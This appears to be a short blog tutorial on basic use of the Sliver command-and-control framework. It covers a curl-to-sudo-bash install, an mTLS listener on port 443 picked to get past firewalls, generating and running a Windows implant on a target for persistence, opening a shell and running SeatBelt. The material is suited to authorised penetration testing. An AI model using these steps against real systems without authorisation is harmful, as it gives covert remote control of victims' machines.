Sliver C2 Basic Usage

3 min readApr 26, 2024



Sliver is a command and control (C2) open source and cross-platform framework released in 2020 by BishopFox. Developed to provide a robust alternative to traditional penetration testing tools, Sliver C2 offers a unique suite of capabilities that supports dynamic interaction with compromised systems. It is built to evade detection and includes features such as multi-platform support, encrypted communications, and the ability to generate modular implants


In this post, I will use Kali Linux, but you can totally follow along if you use another Linux distro

From their GitHub repository, they provide a one-liner to install Sliver

$ curl | sudo bash

Confirm the installation was successful by running the command

$ sliver 

If you have problems starting Sliver, you can restart it by running the command

$ sudo systemctl restart sliver 

Then, try running Sliver again


Today, we will cover only the basic usage of Sliver. If you want more details or advanced features, you can check their documentation here

Setting up the listener

Here, is my attacker IP

I created a listener on port 443. I recommend using common ports because there’s a better chance that the connection will be allowed by the firewall

sliver > mtls --lport 443

You can verify that your listener is running

sliver > jobs

Generating the Implant and using it

My target IP is

In my scenario, I have a reverse shell on my target by exploiting a service, but I will use Sliver to add persistence

First I generate the Implant, this will be an .exe file

sliver > generate --mtls --os Windows --arch 64 

Here you can see the Implant is generated on my Desktop folder as SIGNIFICANT_SUSPENDERS.EXE

I import into the target SIGNIFICANT_SUSPENDERS.EXE and run it

I get a connection back to sliver, by running sessions I can see the information and the ID

sliver > sessions

To interact with the implant use:

sliver > use <ID> 

You can get more information about the commands you can use by running the help command

For example the command shell will give you an interactive shell


You can run post exploitation tools such as Rubeus / SeatBelt and many others. You can see more at

I will demonstrate for SeatBelt

sliver (SIGNIFICANT_SUSPENDERS) > armory install seatbelt

You can now use SeatBelt

sliver (SIGNIFICANT_SUSPENDERS) > seatbelt -group=all

